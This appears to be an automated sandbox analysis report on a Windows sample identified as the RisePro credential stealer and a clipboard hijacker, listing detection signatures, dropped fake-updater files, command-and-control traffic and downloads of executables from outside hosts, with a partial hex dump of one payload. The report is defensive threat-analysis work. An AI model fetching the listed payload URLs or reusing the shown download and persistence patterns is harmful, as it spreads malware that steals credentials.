Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1429350
MD5: d937032f47d04da92a0fa530a7b5b919
SHA1: d07ff5e09b6d39fe506229b156baf87424160ae6
SHA256: 56349484a64abf45ea7b380867d3a2c9dfe9a6554eba52291deabbd35d9eca07
Tags: exe
Infos:

Detection

Clipboard Hijacker, RisePro Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Clipboard Hijacker
Yara detected RisePro Stealer
Contains functionality to implement multi-threaded time evasion
Creates multiple autostart registry keys
Found stalling execution ending in API Sleep call
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\hcMSmyGUCSEFc2FAKlzc.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\k[1].exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Avira: detection malicious, Label: HEUR/AGEN.1304053
Multi AV Scanner detection for domain / URL
Source: http://193.233.132.175/server/k/l2.exe Virustotal: Detection: 19% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe ReversingLabs: Detection: 83%
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe Virustotal: Detection: 80% Perma Link
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe ReversingLabs: Detection: 83%
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\k[1].exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\k[1].exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_c81e728d9d4c2f636f067f89cc14862c\EdgeMS2.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_c81e728d9d4c2f636f067f89cc14862c\EdgeMS2.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\hcMSmyGUCSEFc2FAKlzc.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\hcMSmyGUCSEFc2FAKlzc.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\spanBqgSBuerctg2\zy4GXi5yvCrsiS0ulH8Z.exe Virustotal: Detection: 80% Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Virustotal: Detection: 80% Perma Link
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 31%
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.220.53:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_07142EAD GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 0_2_07142EAD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0715CCFD FindFirstFileExW, 0_2_0715CCFD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0710B2C0 FindFirstFileA,CreateDirectoryA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,CopyFileA,GetLastError,FindNextFileA,FindClose,GetLastError, 0_2_0710B2C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0710BAC0 FindFirstFileA,SetFileAttributesA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError, 0_2_0710BAC0

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2049060 ET TROJAN RisePro TCP Heartbeat Packet 192.168.2.5:49707 -> 193.233.132.47:50500
Source: Traffic Snort IDS: 2046266 ET TROJAN [ANY.RUN] RisePro TCP (Token) 193.233.132.47:50500 -> 192.168.2.5:49707
Source: Traffic Snort IDS: 2046267 ET TROJAN [ANY.RUN] RisePro TCP (External IP) 193.233.132.47:50500 -> 192.168.2.5:49707
Source: Traffic Snort IDS: 2046268 ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Get_settings) 192.168.2.5:49707 -> 193.233.132.47:50500
Source: Traffic Snort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.5:49710 -> 193.233.132.175:80
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49707 -> 193.233.132.47:50500
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.22.1Date: Sun, 21 Apr 2024 23:18:04 GMTContent-Type: application/octet-streamContent-Length: 4563640Last-Modified: Fri, 19 Apr 2024 15:26:27 GMTConnection: keep-aliveETag: "66228d23-45a2b8"Accept-Ranges: bytesData Raw: 4d 5a 40 00 01 00 00 00 02 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 57 69 6e 33 32 20 2e 45 58 45 2e 0d 0a 24 40 00 00 00 50 45 00 00 4c 01 03 00 a9 4d d8 61 00 00 00 00 00 00 00 00 e0 00 02 03 0b 01 0e 1d 00 18 00 00 00 5e 19 00 00 00 00 00 c8 80 77 00 00 10 00 00 00 30 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 7d 00 00 02 00 00 6d 1a 46 00 02 00 00 85 00 00 10 00 00 d0 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 77 00 c8 00 00 00 00 90 77 00 7c f6 05 00 00 00 00 00 00 00 00 00 00 8a 45 00 b8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 80 77 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 4d 50 52 45 53 53 31 00 70 77 00 00 10 00 00 00 82 3f 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 4d 50 52 45 53 53 32 32 0c 00 00 00 80 77 00 00 0e 00 00 00 84 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 e0 2e 72 73 72 63 00 00 00 7c f6 05 00 00 90 77 00 00 f8 05 00 00 92 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 76 32 2e 31 39 77 07 ae 80 3f 00 20 05 00 00 6f fd ff ff a3 b7 ff 47 3e 48 15 72 39 61 51 b8 92 28 e6 a3 86 07 f9 ee e4 1e 82 60 06 2e 19 84 3d c1 98 07 18 3f b1 8a c8 06 21 97 5a 9f 17 26 49 ef d7 89 87 a0 7f f8 9c 1a 49 31 38 ab c9 5a 21 b9 88 59 1b ae 73 bb 19 eb 5b 51 58 ea b8 cf f9 ca 61 e9 ea fc d8 84 59 59 a3 81 db 8e 29 e7 76 bc d0 d2 e2 0b 6e c0 ce 18 8d 84 c5 87 7c 29 a6 0c ed c1 5e 66 bf 07 2b e3 8a 3e 03 98 38 34 68 38 32 67 b0 86 8a 3e 2a b4 68 62 5c b0 a7 9b 45 96 28 ad 78 ba dd 89 a6 ce bc d5 40 b7 38 5f c9 39 ec 34 55 10 6d 18 ec 27 8d 73 cb c6 0f d8 05 bc 23 ff 88 ab da b9 96 30 33 fc b8 00 a9 fc 92 1d 4f c4 e7 90 5d 60 12 9b 53 32 db b8 40 23 0f c7 03 0e ab 10 fd b8 f2 6f 46 7e 9e 2a fd 52 a1 c1 51 7f d0 71 be 6f 98 79 6e fb c1 da 4f 41 40 7c 1f ec 12 e5 67 c5 d8 1f 46 b5 b1 d2 97 12 30 90 6a b0 c9 1f 1e a8 e1 11 73 2f 0b e5 48 af 0a 2b 20 30 43 da 21 be 8e ec f6 37 73 ee f1 5e 48 2c 1a 0b be 82 1d a8 20 0e ce 7b 8d f5 c5 f5 e3 da 80 c7 b4 ba 02 87 94 03 b5 02 97 44 af ba e5 e0 f5 bf 72 12 49 97 0b 2c 7c 8b 1d ae 9b bd d0 7f a8 75 84 36 ba bb 9e 15 0a be 45 3e 71 de d7 7d 7f dc d8 99 86 67 a0 c3 29 e4 8b 55 fe e5 4d 45 98 27 d7 91 6a 7d f4 1a 1a c6 e0 91 00 ee f6 37 5e 0a 8d
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View IP Address: 34.117.186.192 34.117.186.192
Source: Joe Sandbox View IP Address: 104.26.5.15 104.26.5.15
Source: Joe Sandbox View IP Address: 193.233.132.175 193.233.132.175
Source: Joe Sandbox View IP Address: 193.233.132.175 193.233.132.175
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
Source: Joe Sandbox View ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
May check the online IP address of the machine
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: ipinfo.io
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /wp-content/upgrade/k.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: easy2buy.aeCache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.175Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.175Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.175
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.47
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00BA23C0 recv,recv,recv,recv,recv,recv,setsockopt,recv,recv,__Xtime_get_ticks,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,Sleep,recv,Sleep, 0_2_00BA23C0
Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /wp-content/upgrade/k.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: easy2buy.aeCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /server/k/l2.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 193.233.132.175Cache-Control: no-cache
Source: unknown DNS traffic detected: queries for: ipinfo.io
Source: file.exe, 00000000.00000003.2282613958.000000000172C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.175/server/k/l2.exe
Source: file.exe, 00000000.00000002.4492597224.000000000172E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2255465560.000000000172B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2282613958.000000000172C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.175/server/k/l2.execom
Source: file.exe, 00000000.00000002.4493848204.00000000062F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.175/server/k/l2.exev
Source: file.exe, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.7.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: file.exe, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.7.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: file.exe, 00000000.00000002.4493331153.0000000003337000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.exif/1U
Source: file.exe, 00000000.00000002.4493331153.0000000003337000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ns.microsofo/1.2/
Source: file.exe, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.7.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: file.exe, 00000000.00000002.4491758159.0000000000C32000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: file.exe, 00000000.00000003.2104662716.0000000006658000.00000004.00000020.00020000.00000000.sdmp, H4VYK_JIpU1TWeb Data.0.dr, EdetWCNLNo9NWeb Data.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2104662716.0000000006658000.00000004.00000020.00020000.00000000.sdmp, H4VYK_JIpU1TWeb Data.0.dr, EdetWCNLNo9NWeb Data.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2104662716.0000000006658000.00000004.00000020.00020000.00000000.sdmp, H4VYK_JIpU1TWeb Data.0.dr, EdetWCNLNo9NWeb Data.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2104662716.0000000006658000.00000004.00000020.00020000.00000000.sdmp, H4VYK_JIpU1TWeb Data.0.dr, EdetWCNLNo9NWeb Data.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.4492597224.000000000172E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2255465560.000000000172B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2282613958.000000000172C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/
Source: file.exe, 00000000.00000002.4492597224.000000000172E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2255465560.000000000172B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2282613958.000000000172C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4492597224.00000000016F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com/demo/home.php?s=81.181.57.52
Source: file.exe, 00000000.00000002.4492597224.00000000016E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://db-ip.com:443/demo/home.php?s=81.181.57.52z
Source: file.exe, 00000000.00000003.2104662716.0000000006658000.00000004.00000020.00020000.00000000.sdmp, H4VYK_JIpU1TWeb Data.0.dr, EdetWCNLNo9NWeb Data.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2104662716.0000000006658000.00000004.00000020.00020000.00000000.sdmp, H4VYK_JIpU1TWeb Data.0.dr, EdetWCNLNo9NWeb Data.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2104662716.0000000006658000.00000004.00000020.00020000.00000000.sdmp, H4VYK_JIpU1TWeb Data.0.dr, EdetWCNLNo9NWeb Data.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000002.4494156670.000000000666F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae/
Source: file.exe, 00000000.00000003.2282645633.00000000066A1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4492597224.000000000172E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2255465560.000000000172B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2282613958.000000000172C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4494156670.000000000666F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae/wp-content/upgrade/k.exe
Source: file.exe, 00000000.00000002.4492597224.000000000172E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2255465560.000000000172B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2282613958.000000000172C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae/wp-content/upgrade/k.exei
Source: file.exe, 00000000.00000002.4494156670.0000000006694000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2282645633.00000000066A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae:80/wp-content/upgrade/k.exe
Source: file.exe, 00000000.00000002.4494156670.0000000006694000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2282645633.00000000066A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://easy2buy.ae:80/wp-content/upgrade/k.exey4
Source: file.exe, 00000000.00000002.4492597224.0000000001691000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4492597224.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4492597224.000000000172E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2255465560.000000000172B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2282613958.000000000172C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/
Source: file.exe, 00000000.00000002.4491758159.0000000000C32000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: https://ipinfo.io/Content-Type:
Source: file.exe, 00000000.00000002.4492597224.00000000016D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: file.exe, 00000000.00000002.4492597224.00000000016BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/j
Source: file.exe, 00000000.00000002.4492597224.0000000001691000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/sR
Source: file.exe, 00000000.00000002.4492597224.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4492597224.00000000016D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/widget/demo/81.181.57.52
